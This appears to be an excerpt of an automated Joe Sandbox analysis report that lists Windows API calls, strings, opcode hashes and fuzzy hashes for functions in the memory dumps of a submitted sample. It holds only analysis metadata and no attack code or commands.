                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F37006
                                                              • __invoke_watson.LIBCMT ref: 00F37077
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction ID: 23874a4513759138751b975a372485799b9cbedd2d16f9abbc1e0f3dfe3ae8e8
                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction Fuzzy Hash: C57109B6E00716ABD724EF78DC41B5AB7B8AF04374F148129F914E7281E774DD40AB90
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F72542
                                                              • GetMenuItemInfoW.USER32(00FD5890,000000FF,00000000,00000030), ref: 00F725A3
                                                              • SetMenuItemInfoW.USER32(00FD5890,00000004,00000000,00000030), ref: 00F725D9
                                                              • Sleep.KERNEL32(000001F4), ref: 00F725EB
                                                              • GetMenuItemCount.USER32(?), ref: 00F7262F
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00F7264B
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00F72675
                                                              • GetMenuItemID.USER32(?,?), ref: 00F726BA
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F72700
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F72714
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F72735
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: 7d8c4d01993ea78ff111ae68445d222333b746ed5e9581731fb7d2ee9f85ac6f
                                                              • Instruction ID: 2c97a3db68a0fd88bafd4f96e2255c314379d8d578a4e0bef006cfe85e3cc222
                                                              • Opcode Fuzzy Hash: 7d8c4d01993ea78ff111ae68445d222333b746ed5e9581731fb7d2ee9f85ac6f
                                                              • Instruction Fuzzy Hash: 1361BF71900249AFDB51CF64CD88EBE7BB9FB05314F18805BE845A7251D731AD0AFB22
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F96FA5
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F96FA8
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F96FCC
                                                              • _memset.LIBCMT ref: 00F96FDD
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F96FEF
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F97067
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: cc57259e6e30779c3b82ee1d31d305dc5e6da95e59c8d9567dd36ba44f8f10ad
                                                              • Instruction ID: 053693fff12d8f9e1ca3f6d035d1d38a3b96d838b6a95d67e209c24a3445002f
                                                              • Opcode Fuzzy Hash: cc57259e6e30779c3b82ee1d31d305dc5e6da95e59c8d9567dd36ba44f8f10ad
                                                              • Instruction Fuzzy Hash: E8616A75900308AFEB11DFA4CC81EEE77B9EB09710F14015AFA14EB2A1D775AD45EB90
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F66BBF
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00F66C18
                                                              • VariantInit.OLEAUT32(?), ref: 00F66C2A
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F66C4A
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00F66C9D
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F66CB1
                                                              • VariantClear.OLEAUT32(?), ref: 00F66CC6
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00F66CD3
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F66CDC
                                                              • VariantClear.OLEAUT32(?), ref: 00F66CEE
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F66CF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: 208570abb50a7653825a48813fca498c028b76a5b5087540ad14e4545f665b76
                                                              • Instruction ID: fd7062fcb59e20b50eb4af8561e9e9ec8bd3734dd3df7ecebf797cb452c011dc
                                                              • Opcode Fuzzy Hash: 208570abb50a7653825a48813fca498c028b76a5b5087540ad14e4545f665b76
                                                              • Instruction Fuzzy Hash: 8F415F71A0021DEFCF00DFA8DC449EEBBB9EF48355F008069E955E7261CB35A949EB90
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00F85793
                                                              • inet_addr.WSOCK32(?), ref: 00F857D8
                                                              • gethostbyname.WSOCK32(?), ref: 00F857E4
                                                              • IcmpCreateFile.IPHLPAPI ref: 00F857F2
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F85862
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F85878
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F858ED
                                                              • WSACleanup.WSOCK32 ref: 00F858F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 128004e9ce853716f471ded0cb394436ac63d6f19bcc02be2169f11918f43d5e
                                                              • Instruction ID: b19470140ceda58fa051fc65b20069a8e1fb10ec65abb9b64c10c4787f563361
                                                              • Opcode Fuzzy Hash: 128004e9ce853716f471ded0cb394436ac63d6f19bcc02be2169f11918f43d5e
                                                              • Instruction Fuzzy Hash: 29517E31A04600DFDB10EF65DC45BAA77E4EF48B20F04452AF956DB2A1DB74ED44EB82
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00F7B4D0
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F7B546
                                                              • GetLastError.KERNEL32 ref: 00F7B550
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00F7B5BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: 586b0967dec04784282f04a5fbf82ce498bf00155a419d08274fc7a1547a73ab
                                                              • Instruction ID: a614441cba7df8f9970a9c00aab80e87d678739673f3af8c0e32f610a7a60453
                                                              • Opcode Fuzzy Hash: 586b0967dec04784282f04a5fbf82ce498bf00155a419d08274fc7a1547a73ab
                                                              • Instruction Fuzzy Hash: 50319035A00209DFCB00EB68CC45FAE7BB4EF45310F18816AE509D7295DB75DA46EB82
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F6AABC
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F69014
                                                              • GetDlgCtrlID.USER32 ref: 00F6901F
                                                              • GetParent.USER32 ref: 00F6903B
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F6903E
                                                              • GetDlgCtrlID.USER32(?), ref: 00F69047
                                                              • GetParent.USER32(?), ref: 00F69063
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F69066
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1536045017-1403004172
                                                              • Opcode ID: 4024ce3cd3122a70792f4a8cf4d490c000df5a03922186fee001360ef6453b3f
                                                              • Instruction ID: 5f890baee69cc65b55cd5a613eb48249dad63c727e9096d820d98b33daaf1b11
                                                              • Opcode Fuzzy Hash: 4024ce3cd3122a70792f4a8cf4d490c000df5a03922186fee001360ef6453b3f
                                                              • Instruction Fuzzy Hash: 8021B675A04208BFDF05ABB0CC85EFEBB79EF45310F10011AB961972E1DB799859FA21
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F6AABC
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F690FD
                                                              • GetDlgCtrlID.USER32 ref: 00F69108
                                                              • GetParent.USER32 ref: 00F69124
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F69127
                                                              • GetDlgCtrlID.USER32(?), ref: 00F69130
                                                              • GetParent.USER32(?), ref: 00F6914C
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F6914F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1536045017-1403004172
                                                              • Opcode ID: 01388f3aa3a965be201a0d04af96f0fcaa16509e5e4fc243b15282f4f453f505
                                                              • Instruction ID: b3b22e79279422a0aa6a71d1093cc21a7b95a4a90c858062383736edc705a3dc
                                                              • Opcode Fuzzy Hash: 01388f3aa3a965be201a0d04af96f0fcaa16509e5e4fc243b15282f4f453f505
                                                              • Instruction Fuzzy Hash: F221C5B5A00209BBDF05ABA4CC85EFEBB78EF45310F104016B911972A2DB799859FB21
                                                              APIs
                                                              • GetParent.USER32 ref: 00F6916F
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00F69184
                                                              • _wcscmp.LIBCMT ref: 00F69196
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F69211
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: bd9675f8a2f42d6e2ac6b28c107bf32b8d8add714799e29b2f8f6409b59ce5de
                                                              • Instruction ID: f3c008480abf4eb0a149a40a4e6a7e73998be2fd5d34e7698b52eb78569621cc
                                                              • Opcode Fuzzy Hash: bd9675f8a2f42d6e2ac6b28c107bf32b8d8add714799e29b2f8f6409b59ce5de
                                                              • Instruction Fuzzy Hash: 2211063764C307BAFA153624DC1BEA7379CDB15730F20002AFA00E54D1EEB1A9517995
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00F888D7
                                                              • CoInitialize.OLE32(00000000), ref: 00F88904
                                                              • CoUninitialize.OLE32 ref: 00F8890E
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00F88A0E
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F88B3B
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00FA2C0C), ref: 00F88B6F
                                                              • CoGetObject.OLE32(?,00000000,00FA2C0C,?), ref: 00F88B92
                                                              • SetErrorMode.KERNEL32(00000000), ref: 00F88BA5
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F88C25
                                                              • VariantClear.OLEAUT32(?), ref: 00F88C35
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              • Opcode ID: d73cef589f7fadf2cbc11e6ac76ad672b4663b8f978c6072d70d4441593a2917
                                                              • Instruction ID: 458a0d64492122c4451c9e87330810cb34c85f01434485963134fbf7291914a1
                                                              • Opcode Fuzzy Hash: d73cef589f7fadf2cbc11e6ac76ad672b4663b8f978c6072d70d4441593a2917
                                                              • Instruction Fuzzy Hash: B6C135B1608305AFC700EF68C88496AB7E9FF89798F40491DF48ADB251DB71ED06DB52
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F77A6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              • Opcode ID: 04cb43373c4a49aba397c16b57b49bab074b9a002beeebcfd034ffa578c8fdd5
                                                              • Instruction ID: e9cf99b756a3ca593732ba93fa878e554112f6fe5dd7ad105a7133187b4cad07
                                                              • Opcode Fuzzy Hash: 04cb43373c4a49aba397c16b57b49bab074b9a002beeebcfd034ffa578c8fdd5
                                                              • Instruction Fuzzy Hash: A7B1B371A183099FDB01EF98C884BBEB7F5FF09321F20842AE505E7251D774A941EB92
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00F711F0
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F70268,?,00000001), ref: 00F71204
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00F7120B
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F70268,?,00000001), ref: 00F7121A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F7122C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F70268,?,00000001), ref: 00F71245
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F70268,?,00000001), ref: 00F71257
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F70268,?,00000001), ref: 00F7129C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F70268,?,00000001), ref: 00F712B1
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F70268,?,00000001), ref: 00F712BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              • Opcode ID: d1130eec9a00414fb222d45609f1a9c2bda7e316daba680babf446235023bf2c
                                                              • Instruction ID: 43647341d811084283f85b467cea0ebc736395219d231f8f5960abd43e85e23d
                                                              • Opcode Fuzzy Hash: d1130eec9a00414fb222d45609f1a9c2bda7e316daba680babf446235023bf2c
                                                              • Instruction Fuzzy Hash: A2319175A01708BBDB309F68EC48F6977AAFB54321F108117F908D61A1E7B49D48FB52
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F1FAA6
                                                              • OleUninitialize.OLE32(?,00000000), ref: 00F1FB45
                                                              • UnregisterHotKey.USER32(?), ref: 00F1FC9C
                                                              • DestroyWindow.USER32(?), ref: 00F545D6
                                                              • FreeLibrary.KERNEL32(?), ref: 00F5463B
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F54668
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: 156d4fd29813bb873dcd323b699c64063f21cabd335e2a862cfb5a050f705c67
                                                              • Instruction ID: 61b5b7e4a5a54813a47cfc2cfe925207f2b1507306d412069828da44d986e9bb
                                                              • Opcode Fuzzy Hash: 156d4fd29813bb873dcd323b699c64063f21cabd335e2a862cfb5a050f705c67
                                                              • Instruction Fuzzy Hash: DCA1B131701212CFCB18EF14C994BA9F364BF45715F5442ADE90AAB261CB34ED9AEF90
                                                              APIs
                                                              • EnumChildWindows.USER32(?,00F6A439), ref: 00F6A377
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                              • API String ID: 3555792229-1603158881
                                                              • Opcode ID: ab4b639f097792db0bf6d63cbcd652f9fe24beb8ba90b55ddfcde2b5260a9172
                                                              • Instruction ID: 3824537e8002be2cbbe20066c998840619ecb7c1f7754db8cd95f4b5d609dd92
                                                              • Opcode Fuzzy Hash: ab4b639f097792db0bf6d63cbcd652f9fe24beb8ba90b55ddfcde2b5260a9172
                                                              • Instruction Fuzzy Hash: 4591A731A04606ABDB08EFA0C852BEDFB74BF04320F548119E85AB7251DF356999FF91
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00F12EAE
                                                                • Part of subcall function 00F11DB3: GetClientRect.USER32(?,?), ref: 00F11DDC
                                                                • Part of subcall function 00F11DB3: GetWindowRect.USER32(?,?), ref: 00F11E1D
                                                                • Part of subcall function 00F11DB3: ScreenToClient.USER32(?,?), ref: 00F11E45
                                                              • GetDC.USER32 ref: 00F4CD32
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F4CD45
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00F4CD53
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00F4CD68
                                                              • ReleaseDC.USER32(?,00000000), ref: 00F4CD70
